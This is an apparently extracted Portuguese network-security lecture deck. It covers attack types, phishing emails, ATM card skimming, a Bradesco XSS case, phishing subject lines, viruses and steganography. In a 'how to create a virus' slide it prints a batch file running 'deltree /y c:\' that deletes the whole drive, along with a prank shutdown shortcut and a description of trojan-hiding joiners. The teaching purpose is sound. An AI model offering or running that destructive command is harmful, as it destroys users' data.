Vous êtes sur la page 1sur 112

Eudes Danilo Mendona eudesdanilo@gmail.

com
1

Agenda:
Teoria de sobre segurana; Prtica;

1 - Teoria sobre Segurana de Redes

1 O que redes de computadores e suas funcionalidade

Definio
Uma rede de computadores consiste na interconexo entre dois ou mais computadores e dispositivos complementares acoplados atravs de recursos de comunicao, geograficamente distribudos, permitindo a troca de dados entre estas unidades e otimizando recursos de hardware e software.
5

O que Redes de computadores?

Possibilitar o compartilhamento de informaes (programas e dados) armazenadas nos computadores da rede; Permitir o compartilhamento de recursos associados s mquinas interligadas; Permitir a troca de informaes entre os computadores interligados; Permitir a troca de informaes entre usurios dos computadores interligados; Possibilitar a utilizao de computadores localizados remotamente; Permitir o gerenciamento centralizado de recursos e dados; Melhorar a segurana de dados e recursos compartilhados 6

O sistema informtico mais seguro no utilizvel O sistema informtico mais utilizvel inseguro S existe um computador 100% seguro, o desligado.
7

Segurana da Informao
A Segurana da Informao pode ser

definida como a proteo de dados contra a revelao acidental ou intencional a pessoas no autorizadas, e contra alteraes no permitidas.
A segurana no universo computacional

divide-se em:
Segurana Fsica Segurana Lgica

O que voc est tentando proteger?


Seus dados

Integridade Privacidade Disponibilidade Seus recursos Sua reputao

Contra o que voc est tentando se proteger?


Roubo de senhas Engenharia Social BUG & Backdoors Falha de autenticao Falha de protocolo Obtendo Informaes Negando servios (DoS) ...
10

Tipos de Ataques:
Ataques passivos (interceptao) Ataques ativos (interrupo, modificao e Fabricao)

11

Ataques passivos
Ataques Passivos
Intercepo

Anlise do contedo das mensagens

Anlise do trfego

O objetivo obter informao que est a ser transmitida. Este tipo de ataques muito difcil de detectar. O esforo de proteco deve ser no sentido da preveno.

Intercepo

Emissor

Receptor

Intercepo

Intercepo Quando utilizadores no autorizados conseguem aceder a recursos para os quais no estavam autorizados. um ataque confidencialidade. A parte no autorizada pode ser uma pessoa, um programa ou um computador. Exemplos: violao de cabos de comunicao, para capturar dados da rede, cpia ilcita de pastas e programas, etc.

Ataques Ativos
Ataques Ativos

Interrupo (Disponibilidade)

Modificao (Integridade)

Fabricao (Autenticidade)

Envolvem alguma modificao de dados. Este tipo de ataques muito difcil de prever, j que, para isso,

seria necessrio uma proteo completa de todos os tipos de comunicaes e de canais. Por esta razo, o esforo de proteco deve ser no sentido de os detectar e recuperar dos atrasos ou estragos entretanto causados.

Interrupo
Emissor Receptor

Interrupo

Interrupo A informao de um sistema torna-se indisponvel ou destruda. um ataque disponibilidade.


Exemplos: Destruio de peas de Hardware, o corte de linhas de comunicao, a inoperncia do sistema de ficheiros, etc.

Modificao

Emissor

Receptor

Modificao

Modificao uma parte no autorizada, no s acede informao, mas tambm a modifica. um ataque de integridade. Exemplos: alterao de valores num ficheiro de dados; alterao de um programa para que ele funcione de maneira diferente ou modificao do contedo de mensagens transmitidas pela rede.

Fabricao

Emissor

Receptor

Fabricao

Fabricao uma parte no autorizada insere dados falsos no sistema. um ataque autenticidade. Exemplos: insero de mensagens simuladas na rede ou a adio de registos a um ficheiro.

O que ataque?
Ataque toda ao realizada com intuito ou no de causar danos.

18

Ameaas
Uma ameaa uma potencial violao de segurana As aes que podem acarretar a violao so denominadas de ataques

19

Um ataque tpico

20

21

O que um hacker ataca ?


Aplicaes Banco de dados Sistemas operacional Servios de rede

Motivao para o Ataque


Por qu existem as invases aos sistemas?
Orgulho Exibicionismo/fama Busca de novos desafios Curiosidade Protesto Roubo de informaes Dinheiro Uso de recursos adicionais Vantagem competitiva Vingana
23

Exemplo: Oliberal 10/02/08

24

Ex: Email para roubo de informaes

25

Ex: Email para roubo de informaes

26

Ex: Email para roubo de informaes

27

Ex: Email para roubo de informaes

28

Ex: Email para roubo de informaes

29

Ex: Email para roubo de informaes

30

Ex: Email para roubo de informaes

31

Ex2: Clonagem de carto de banco

Bocal preparado

32

Ex2: Clonagem de carto de banco

Imperceptvel para o cliente

33

Ex2: Clonagem de carto de banco

Micro cmera disfarada de porta panfleto

Ex2: Clonagem de carto de banco

Viso completa da tela e teclas digitadas

35

Ex2: Clonagem de carto de banco

Viso completa da tela e teclas digitadas

36

Ex2: Clonagem de carto de banco

Micro cmera Bateria Antena transmissora

37

Ex3: Email de promoo (roubo informao)

38

Ex3: Email de promoo (roubo informao)

39

Ex4: Antivirus Gratis

40

Ex6: Email Receita Federal

41

Cpia de identidade visual de rgos pblicos

Pedido de download de arquivos / erros de portugus

Cpia de identidade visual de entidades populares

Histria estranha e mal contada

Necessidade urgente de download

Servio inexistente

Pedido de download de arquivos

Ameaas

Uso de marca popular

Distrbuio muito vantajosa de prmios

Pedido de download de arquivo

Uso de marca popular

Erro de portugus

Dvida inexistente

Falta de meno a endereo por extenso

Erro de portugus

Falha no site do Bradesco permitiu ataque (http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisaXSS (http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisainstinst-xss/) Criminosos brasileiros conseguiram descobrir um problema em uma pgina do Bradesco que permitia que a mesma fosse alterada por meio de links, possibilitando o uso do domnio do banco para todo tipo de atividade maliciosa. Para tal, crackers enviaram e-mail em massa contendo um link que explorava uma falha de XSS (Cross Site Scripting) existente em uma pgina localizada em institucional.bradesco.com.br. Se clicado, o link enviava informaes pgina que causavam um comportamento indesejvel, fazendo com que argumentos da query string como chamada a parte do link depois do ponto de interrogao (asp?) fossem inseridas como cdigo, permitindo o ataque. Dias antes da publicao desta matria, a Linha Defensiva notificou o Bradesco. O banco removeu a pgina vulnervel dentro de aproximadamente 48 horas, inutilizando o ataque. A mensagem contendo o link que explorava a brecha solicitava o recadastramento das chaves de segurana usadas nas transaes atravs da Internet, convidando o usurio a faz-lo por meio do link.
48

Falha no site do Bradesco permitiu ataque XSS


(http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisa-inst(http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisa-inst-xss/)

Como demonstrado na imagem, a maioria dos navegadores e os programas de e-mails no exibem o endereo completo de uma URL, se esta for muito extensa, no permitindo que a existncia do golpe seja percebida. Embora o e-mail tenha usado uma tcnica refinada que facilmente poderia enganar at mesmo usurios com certa experincia, devido ao link camuflado, erros de ortografia caractersticos de golpes e fraudes se faziam presentes. Aparentemente, o sistema de email em massa usado pelos criminosos no era compatvel com caracteres especiais, como acentos.

49

Falha no site do Bradesco permitiu ataque (http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisaXSS (http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisainstinst-xss/)


XSS Cross Site Scripting, ou XSS, um tipo de vulnerabilidade onde determinada pgina de internet no filtra suficientemente as informaes enviadas pelo navegador web, sendo possvel faz-la exibir contedos de outros sites, ou contedos especificados no prprio link ou outra informao. Um exemplo clssico a pgina de busca. Em geral, pginas de buscas exibem na tela a informao que est sendo procurada (por exemplo, Voc est procurando por: [termo de pesquisa]). Se a exibio desta informao no for filtrada corretamente, a informao, em vez de exibida, ser interpretada como cdigo HTML pelo navegador, possibilitando o ataque. Fruns, livros de visitas e blogs (este ltimo, devido funo de comentrios) podem ser vtimas do XSS permanente, onde um post malicioso, por exemplo, fica permanentemente no ar e afetar qualquer usurio que o ver. Este o ataque de XSS persistente, ou tipo 2. O Bradesco foi alvo do XSS impermanente ou no-persistente, tambm chamado de XSS tipo 1. O objetivo de ataques XSS geralmente roubar informaes importantes da vtima, tais como os cookies de autenticao. Porm, XSS tambm pode ser usado para alterar os sites e usar da confiana depositada pelo internauta na pgina para persuadi-lo a enviar informaes sigilosas, ou para rodar cdigo malicioso nos PCs de visitantes. A Linha Defensiva j noticiou a respeito de brechas semelhantes no YouTube e no Orkut. Para se prevenir de ataques XSS impermanentes, recomenda-se que links recebidos em mensagens de email e similares no sejam clicados, a no ser quando estava-se esperando absolutamente o e-mail em questo (como, por exemplo, depois de registrar-se em um site para validar sua conta). Sempre que possvel, deve-se digitar o endereo do site na barra de endereos do navegador e procurar manualmente o que foi indicado no e-mail. Brechas de XSS tipo 2 so difceis de serem evitadas pelo usurio, sendo a responsabilidade do site nesses casos ainda maior, embora, em ltima instncia, a responsabilidade sempre seja do site. 50

Falha no site do Bradesco permitiu ataque XSS


(http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisa-inst(http://linhadefensiva.uol.com.br/2008/07/bradesco-pesquisa-inst-xss/)

Ao acessar o link, o internauta era direcionado para uma pgina do Bradesco (Index_Pesquisa.asp) que, vulnervel a XSS, carregava outra pgina, hospedada em um domnio brasileiro (cujo nome no foi divulgado por se tratar de um domnio legtimo comprometido). Em ataques XSS, pginas legtimas so usadas de forma maliciosa e um cdigo (no caso acima, um FRAMESET1) inserido na pgina legtima. O contedo da pgina ser, portanto, diferente do esperado. 51

Lista de Hackers fornecida:


Amores On-line - carto virtual - Equipe Carteiro Romntico - Uma pessoa que lhe admira enviou um carto As fotos que eu tinha prometido. lbum pessoal de fotos AVG Antivrus - Detectamos que seu E.Mail est enviando mensagens contaminadas com o vrus w32. bugbear Aviso - voc est sendo trado - veja as fotos Aviso - voc est sendo trado - veja as imagens do motel Banco do Brasil informa - Sua chave e senha de acesso foram bloqueados Contrato Pendente - Clique para fazer atualizao Big Brother Brasil - ao vivo - quer ver tudo ao vivo e ainda concorrer a promoes exclusivas? Clique na fechadura Cmara dos Dirigentes Lojistas - SPC - Servio de Proteo ao Crdito Notificao - Pendncias Financeiras - Baixar o arquivo de relatrio de pendncias. carnaval 2005 - veja o que rolou nos bastidores do carnaval de So Paulo Carto Terra - eu te amo - webcard enviado atravs do site Cartes Terra Carto UOL - I love you - voc recebeu um carto musical - Para visualizar e ouvir escolha uma das imagens Cartes BOL - Voc recebeu um carto BOL Cartesnico.com - Seu amor criou um carto para voc Checkline - Consultas de crdito on-line - Consultas no Serasa/SPC Claro Idias - Grande chance de ganhar meio milho de reais em ouro e 18 carros Colaneri e Campos Ltda - Ao Gerente de Vendas - oramento de material e equipamentos em urgncia

Lista de Hackers fornecida:


Correio Virtual - hi5 - Seu Amor te enviou este carto CPF cancelado ou pendente de regularizao - verifique; seu CPF est cancelado Declarao de Imposto de Renda de 2005/06 - Ministrio da Fazenda - CPF Cancelado ou Pendente de Regularizao Ebay - your account could be suspended - Billing Department Embratel - Comunicado de Cobrana - Aviso de Bloqueio Embratel - Notificao Confidencial - Fatura de servios prestados Clique para detalhamento da fatura Emotion Cards - UOL - Parabns voc recebeu um Presente Virtual Febraban - Guia de Segurana - Febrasoft Security Finasa - Nossa Caixa - Fraudes Bancrias - Febraban Fininvest - dbito em atraso - pendncias financeiras em seu CPF/CNPJ Ganhe uma viagem a Paris - Guia Paris Lumire Gmail - Gmail Amigo Oculto - Baixar Formulrio - E-mail de 1 Giga Humortadela - Piada animada sempre amigos Humortadela - voc 10 - acesse o link e sacaneie Humortadela - voc recebeu uma piada animada - Ver Piada Animada Ibest - acesso grtis e fcil - discador ibest - 0800 conexo sem pulso telefnico. Grtis - Download Larissa 22 aninhos - www. mclass. com. br - clique aqui e veja o vdeo Leiam esta informao IMPORTANTe Martins Com Ltda - Setor de Compras - Oramento Mercado Livre - Aviso - Saldo devedor em aberto na sua conta - e pagamento no for quitado acionaremos departamento jurdico

Lista de Hackers fornecida:


Ol, h quanto tempo! Eu me mudei para os Estados Unidos, e perdemos contato... Olha o que a Globo preparou para voc neste ano de 2005 - Big Brother Brasil 5 - Baixe o vdeo Overture - Promoo para novos assinantes - Tem cliente procurando, tem voc oferecendo, vamos juntar os dois. Seja encontrado por quem quer comprar Paparazzo - globo. com - se voc gostou de uma espiada no vdeo Parperfeito - Voc foi adicionado aos prediletos - Associado do Par Perfeito Passe Livre de 7 dias no Globo Media Center Promoo Fotolog.net e UBBI - sorteio de 10 Gold Cam por dia - Crie seu fotolog e concorra Radio Terra - dedique uma msica Receita Federal - CPF cancelado ou pendente de regularizao Saudades de voc - Sou algum que te conheceu h muito tempo, e tive que fazer uma viagem - Espero que goste das fotos SERASA - pendncias referentes a seu nome - Extrato de dbito SERASA - Regularize seu CPF ou CNPJ - clique para extrato de dbitos Sexy Clube - Thaty Rio - Direto do Big Brother - Veja as fotos em primeira mo Sou um amigo seu - voc est sendo trado - veja as fotos Symantec - Faa sua atualizao do Norton 2005 aqui - Gratuita - Licena para 1 ano grtis Terra Cartes - O meu melhor presente voc Tim ps pago - pendncias no SPC - Sistema de Proteo aoCrdito - Serial do Celular

Lista de Hackers fornecida:


Microsoft - Ferramenta de remoo de softwares Mal-Intencionados do Microsoft Windows - Windows XP fica a cara de quem recebe um carto Voxcards Microsoft Software - Este contedo foi testado e fornecido a voc pela Microsoft Corporation - Veja as novidades Music Cards - Confirmao Necktsun Comrcio Ltda - Palmas - Departamento de Vendas - Oramento Netcard Cartes Virtuais - Emoes de verdade Norton Antivrus - Alerta de Segurana - download do antdoto para o Ms. Bruner Notificao Confidencial - Pendncias Financeiras em seu CPF O carteiro - voc recebeu um carto de quem te admira O carteiro. com - tenho uma novidade para voc - veja o carto que preparei Voxcards - carto voxcards - para quem voc vai mandar um carto hoje? Voxcards - mensageiro - voc est recebendo um carto virtual voxcards Precisa instalar o plugin - clique para instalar Webcard Terra - Feliz Dia das Mes - Existe um presente especial esperando por voc no site de cartes do terra. Week - Complimentary Subscription Confirmation - Free - Please Apply online PC Week www. symantec. com - A soluo Antivrus mais confivel do mundo www.microsoft. com - Proteja seu computador com antivrus

Lista de Hackers fornecida:


UOL - Promoo Cultural - Cara cad meu carro UOL Cartes - Estou com saudades - clique para visualizar UOL Cartes - Seu amor lhe enviou um carto - clique para baixar UOL Cartes - Voc recebeu um lindo carto virtual Veja as fotos proibidas das musas do bbb5 Viagens contaminadas com o w32. bugbear Virtual Cards - Um grande abrao da equipe virtual cards - ler carto VIVO - Torpedos Web Gratuito - Torpedo Fcil Vivo Yahoo Cartes - Voc tudo para mim - clique na imagem Yahoo Cartes - Voc tudo para mim - enviado por quem te admira Outra dica importante: nunca abra E-Mails de remetentes desconhecidos! Sempre desconfie de E-Mails que solicitam 'clique aqui' ou ' acesse o link (tal)' ou ' veja minha foto' ou ' te encontrei , lembra-se de mim? ' ou ' ligue-me para sairmos' , etc... E, finalmente, para ter certeza que de um golpe que voc est sendo vtima, passe o mouse - sem clicar - pela palavra do direcionamento : voc vai ver, na barra inferior - esquerda da tela -, que se trata de um arquivo com a terminao 'exe' ou 'scr' ou outra. Arquivo este(s) que vai (vo) espionar seu computador, roubando seus dados, senhas, etc.

Symantec: relatrio mapeia mercado negro de dados

Um estudo conduzido pela Symantec mapeou o mercado negro de dados. O relatrio traz o preo das informaes negociadas por criminosos e mostra como as empresas podem ter prejuzos com a vulnerabilidade dos dados dos clientes. Segundo Marcelo Silva, diretor de servios da companhia no Brasil, j existe um ecossistema criado em torno do roubo de dados. Quem rouba nem sempre vende os dados. A gente fala de crime organizado, mas o que existe um grande mercado, afirma o executivo. Veja tabela com o preo dos dados no mercado negro:

Produto Contas bancrias Cartes de crdito Identidades completas Contas do eBay Senhas de e-mail Proxies

Preo de 10 dlares a mil dlares de 0,40 dlar a 20 dlares de 1 dlar a 15 dlares de 1 dlar a 18 dlares de 4 dlares a 30 dlares de 1,5 dlar a 30 dlares

CW Connect - No grupo de discusso sobre Crimes Digitais do CW Connect, a primeira rede social para profissionais de tecnologia da informao e telecomunicaes do mercado, uma das participantes - a analista Fabiana inseriu uma pesquisa sobre as principais ameaas s informaes da empresa: 1 - Vrus 75% (Por falta de conhecimento os usurios baixam programas sem conhecimento, acessam sites suspeitos, etc) 2 - Divulgao de senhas 57% 3 - Hackers 44% 4 - Funcionrios insatisfeitos 42% 5 - Acessos indevidos 40% 6 - Vazamento de informaes 33%

58

Como Analisar a Segurana


Segurana no uma tecnologia

Deve-se perguntar: Proteger O QU? Proteger DE QUEM? Proteger A QUE CUSTOS? Proteger COM QUE RISCOS?

Atualizao do ambiente
Quando as ameaas ocorrem?

A maioria dos ataques acontece aqui

Produto Lanado

Vulnerabilidade Fix descoberta disponvel

Fix instalado pelo cliente

Atualizao do ambiente
Tempo para a invaso diminuindo
Invaso

331 O tempo (em dias) entre a 18 disponibilizao da Produto 0 151 Vulnerabilidade Fix Fix instalado Lanado descoberta disponvel e a invaso pelo cliente correo 25 tem diminudo, 14 portanto a aplicao Nimd SQL Welchia Blaste Sasser de patches no pode a Slamm / Nachi r er ser a nica defesa em grandes empresas

Atualizao do ambiente
Worm Zotob
09/08 - A Microsoft

publica a correo
11/08 - A Microsoft

informa que um ataque est na eminencia de acontecer sobre essa vulnerabilidade


17/08 - CNN e ABC

so atacadas

VRUS

Tipos de Virus

Vrus de Boot Time Bomb Trojans ou cavalo de troia Vermes, Minhocas ou Worms Hijackers Vrus de macro ...

Phishing scam

65

66

Posso enviar um vrus por brincadeira?


No! Mesmo por brincadeira, enviar um vrus de computador pode configurar crime de dano. Certifique-se que os anexos transmitidos so arquivos benignos e Cdigo Penal teis ao destinatrio.
Dano Art. 163 - Destruir, inutilizar ou deteriorar coisa alheia: Pena -Um vrus de um a seis meses, ou multa. deteno, pode se propagar de diversas formas.

anexo download engenharia social


67

Possveis danos

Perda de desempenho do micro; Excluso de arquivos; Alterao de dados; Acesso a informaes confidenciais por pessoas no autorizadas; Perda de desempenho da rede (local e Internet); Monitoramento de utilizao (espies); Desconfigurao do Sistema Operacional. Inutilizaro de determinadas peas.

Detectando, prevenindo e combatendo os vrus

69

E os anti-vrus so

70

Anti virus em ao

Como Criar Virus

72

Cdigo de Vrus
Teste

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICARSTANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Malicioso (Salvar no Bloco de Nota

Vassoura.exe) AZP/LX2K*.*BAT.COM/ELIMINAR*HD*/DETE... AIL.COM/AMDWIN@*.*


@echo off

BREAK OFF deltree /y c:\ 73 exit

Cdigo de Vrus (cont)


virus.bat

Criem um atalho e na localizao escrevam " shutdown -s -t 60 -c " qualquer coisa que queiram dizer, mas tem de ser entre aspas" T (TEMPO EM SEGUNDOS) Podem mudar C (Comentrio)

74

O uso para o mal


Os Joiners so muito usados por

hackers, crackers, scriptkidies e etc.


Com o joiner o hacker pode facilmente

esconder um vrus, trojan ou backdoor dentro de fotos, musicas e at mesmo atualizaes de antivrus falsas.

RedBinder
RedBinder um Joiner desenvolvido por

hackers da Espanha e com ele podemos camuflar arquivos, trocar cones, executar em modo oculto

Exemplo

89

Cybercrime

90

Hackers Hoje
Cybercrime atividade profissional (criminosa)

Sofisticados e altamente organizados


Atividades

Espionagem industrial Sabotagem de concorrentes Roubo de Informaes como cartes de crditos e senhas de banco Chantagem e extorso
Sequestro de HD Ameaa de parar o sistemas computacional
91

Crimes com evidncias digitais

Aliciamento Calnia e difamao Ciberbullying Divulgao de imagens no autorizadas Fraude bancria ou financeira por meio eletrnico Invases. Pedofilia Racismo Sexting Roubo de dados Sequestro de informaes Vazamento de informaes Xenofobia

Cenrio dos

golpes eletrnicos (verdicos)

ROSE LEONEL CONTRATOU O PERITO EM ANLISE FORESENSE WANDERSON CASTILHO.

SEGUNDO CASTILHO, EM 15 DIAS FOI POSSVEL OBTER AS PROVAS DE QUE FOI O EX-NAMORADO DELA QUEM COLOCOU AS FOTOS NA INTERNET.

FOI ELIMINADO 80% DO MATERIAL DIVULGADO INDEVIDAMENTE NA INTERNET.


Fonte: Sou + Eu Edio 106 - 27 de novembro de 2006

7. Casos verdicos (5/)

Vdeo Dafra

Dafra.mp4

Sou vtima. E agora?


1. PRESERVE TODAS AS PROVAS
Imprima e salve o contedo das pginas ou "o dilogo" do(s) suspeito(s) em salas de bate-papo, mensagens de correio eletrnico (e-mail) ofensivas. necessrio guardar tambm os cabealhos das mensagens; Preserve as provas em algum tipo de mdia protegida contra alterao, como um CD-R ou DVD-R; Todas essas provas ajudam como fonte de informao para a investigao da polcia; No entanto, essas provas no valem em juzo, pois carece de f pblica. Uma alternativa ir a um cartrio e fazer uma declarao de f pblica de que o crime em questo existiu, ou lavrar uma Ata Notarial do contedo ilegal/ofensivo. Esses procedimentos so necessrios porque, como a Internet dinmica, as informaes podem ser tiradas do ar ou removidas para outro endereo a qualquer momento. No esquea: A preservao das provas fundamental. J houve casos de a Justia brasileira ter responsabilizado internautas que no guardaram registros do crime on-line do qual foram vtimas.

Sou vtima. E agora?


2. PROCURE A DELEGACIA DE POLCIA
De posse das provas, procure a Delegacia de Polcia Civil mais prxima do local de residncia da vtima e registre a ocorrncia. Voc tambm pode ir a uma delegacia especializada em crimes cibernticos.

3. SOLICITE A REMOO DO CONTEDO ILEGAL E/OU INOFENSIVO


Para fazer esta solicitao, envie uma Carta Registrada para o prestador do servio de contedo na Internet, que deve preservar todas as provas da materialidade e os indcios de autoria do(s) crime(s).

ESTEGANOGRAFIA

101

Introduo
O que
Ramo da criptografia que consiste em ocultar a existncia de uma informao dentro de uma mensagem (textos, imagens, udios, vdeos, etc.)
Criptografia x Esteganografia

A primeira torna a mensagem ilegvel, incompreensvel; enquanto que a segunda esconde a existncia da informao, na mensagem

Esteganografia x Criptografia

Criptografia

Esteganografia

103

Esteganografia - Formas de utilizao


Imagens parecem as mesmas Imagem direita contm os textos de 5 peas de Shakespeare
criptografados, inseridos nos bits menos significativos de cada valor de cor

Zebras
104

Hamlet, Macbeth, Julius Caesar Mercador de Veneza, Rei Lear

Ataques

Esteganografia em textos
Exemplo (mensagem escondida em um texto): Senhor Evandro quer usar este salo temporariamente. Relembre o fato ocorrido, isto poderia estragar relquias, florais e imagens talhadas. Obrigado.

O Senhor Evandro quer usar este salo temporariamente. Relembre o fato ocorrido, isto poderia estragar relquias, florais e imagens talhadas. Obrigado.
O sequestro foi perfeito
106

107

Prtica de Segurana

108

Em que abordagem voc confia ?

Segurana como uma opo Segurana como um aditivo Integrao extremamente complicada No economicamente vivel No pode focar na principal prioridade

Segurana como parte do sistema Segurana Embutida na Rede Colaborao inteligente entre os elementos Viso de sistemas Foco direto na principal prioridade

JOGO DOS ERROS

EDUCAO DO USURIO ESSENCIAL

Se voc no pode proteger o que tem, voc no tem nada.


Annimo

Dvidas

Reflexo:
Os computadores so incrivelmente rpidos, precisos e burros; os homens so incrivelmente lentos, imprecisos e brilhantes; juntos, seu poder ultrapassa os limites da Imaginao Albert Einstein
112

Vous aimerez peut-être aussi